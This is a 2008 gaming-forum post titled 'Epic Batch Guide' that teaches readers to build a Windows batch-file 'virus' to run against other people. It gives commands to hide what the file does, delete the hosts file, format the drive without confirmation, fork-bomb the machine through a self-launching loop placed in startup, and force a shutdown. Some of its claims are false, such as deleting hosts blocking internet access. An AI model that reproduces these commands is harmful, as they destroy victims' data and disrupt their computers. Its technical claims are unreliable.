Go Back   Gaming Gutter > Just Chat > Guides & Tutorials


Guides & Tutorials - Your gaming walk-thrus and tutorials.

» Site Navigation
» Home
» FAQ
» Log in
User Name:

Password:

Not a member yet?
Register Now!
» Advertisement
» Recent Threads
Go to first new post Selling a few pets for NP
Yesterday 09:06 AM
Last post by kamikaze_turtle
Today 05:25 PM
2 Replies, 3 Views
Go to first new post Watch Movies Online
05-23-2008 11:14 PM
by altoxx
Last post by HotTopic
Today 05:24 PM
9 Replies, 25 Views
Go to first new post [B] FQD!
Today 05:24 PM
Last post by NextGenWarrior
Today 05:24 PM
0 Replies, 1 Views
Go to first new post Asda
08-28-2008 03:22 PM
by Pandox
Last post by Pandox
Today 05:23 PM
13 Replies, 14 Views
Go to first new post QS> Electric Kougra +...
Today 06:06 AM
Last post by Arthritis
Today 05:22 PM
2 Replies, 3 Views
Closed Thread
 
LinkBack Thread Tools Display Modes

 Epic Batch Guide
Old 05-18-2008, 07:02 AM   #1 (permalink)
Junkas Junkas is offline Gender Male
Banned
 
Junkas is offline
Join Date: Nov 2006
Location: New Jersey
Age: 13
Posts: 953
iTrader: 0 / 0%
Junkas Is Amongst RoyaltyJunkas Is Amongst Royalty
Rep Power: 0
Epic Batch Guide

Epic Batch Guide 1.0


Lets start with simplistic, say you want to to make your virus (of sorts) display a message, you would do that with echo.

Code:
@echo FUCK YOU!!
Simple enough; now you need to follow that up with some commands for doing stuff. Make sure echo is off.

Code:
@echo off
Put that as the first line in your batch file. This makes it so that they (the people running the file) cannot see what the batch file is doing.

Now Some Commands.

1) Block Internet Access

Code:
 cd WINDOWS\SYSTEM32\DRIVERS\ETC
attrib hosts -r -h
del hosts
That deletes the files that are necessary for you to access the internet.
(Also, make sure echo is OFF, or else it show that the file is deleting stuff)

2) Hidden Command (HiCM)

Quote:
format /autotest
This command is lesser know, because it is indeed not documented. What this does is format the main drive without asking for confirmation from the user. Make sure echo is off so it does not show the formatting process.

3) Unending Loop

Code:
@echo off
:loop
start ****.bat
goto loop
You change out **** with the name of your batch file, what this does is continually open and open and open the batch file slowing your PC down until it dies, you must have a fast computer, 4 gigs of ram or more to defend against this attack. For extra lulz make it copy into system startup.

Protip: You may want to use remarks, so you can go back and edit them later, knowing what you put them there for.

Code:
rem THIS IS A REMARK, BASICALLY A COMMENT IN THE CODE.
4) Shutdown force

Code:
shutdown -r -t 10 -c ""
In between the quotations is where you want to put the shutdown message, it can be anything at all.

/Guide
 
Closed Thread

Bookmarks



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Powered by vBadvanced CMPS v3.0 RC2

All times are GMT -7. The time now is 05:25 PM.


vBulletin skin developed by: eXtremepixels
The contents of this webpage are copyright © 2006-2008 GamingGutter.com. All Rights Reserved.

Page generated in 0.10004306 seconds (100.00% PHP - 0% MySQL) with 19 queries